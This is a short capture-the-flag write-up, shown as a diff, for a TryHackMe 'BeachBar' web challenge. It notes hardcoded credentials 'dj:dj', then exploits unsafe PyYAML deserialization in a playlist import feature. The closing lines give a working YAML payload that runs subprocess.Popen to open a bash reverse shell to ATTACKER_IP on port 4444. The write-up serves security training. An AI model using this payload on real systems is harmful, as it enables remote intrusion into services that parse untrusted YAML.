pankajsharma52/tryhackme/hackerholidays2026/BeachBar.md

 Day 5 | Easy • Web • Boot2root

-The assessment began by reviewing the exposed source code of the web application, which revealed the hardcoded credentials dj:dj.
+The assessment began by reviewing the application's page source, which revealed the hardcoded credentials dj:dj.
 After logging in, the Import Playlist functionality was identified.
 The YAML parser was tested with !!python/tuple and !!python/name:os.system, confirming unsafe PyYAML deserialization.
 Remote Code Execution (RCE) was achieved using the following payload:

 !!python/object/apply:subprocess.Popen
 args: [['/bin/bash', '-c', 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1']]